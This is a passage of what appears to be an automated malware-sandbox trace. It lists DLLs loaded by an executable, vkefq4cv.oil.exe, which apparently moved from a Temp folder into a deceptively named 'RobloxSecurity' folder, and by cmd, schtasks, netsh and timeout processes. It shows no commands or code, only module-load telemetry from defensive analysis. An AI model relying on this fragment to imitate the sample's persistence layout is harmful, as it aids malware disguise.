                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                  Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                  Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                  Source: C:\Windows\System32\timeout.exeSection loaded: version.dll
                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: httpapi.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: dpapi.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: rasapi32.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: rasman.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: rtutils.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: windowscodecs.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: secur32.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: schannel.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: mskeyprotect.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: ntasn1.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: ncrypt.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: ncryptsslp.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: edputil.dll
                  Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                  Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: httpapi.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: dpapi.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: rasapi32.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: rasman.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: rtutils.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: windowscodecs.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: secur32.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: schannel.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: mskeyprotect.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: ntasn1.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: ncrypt.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: ncryptsslp.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: edputil.dll
                  Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                  Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                  Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                  Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
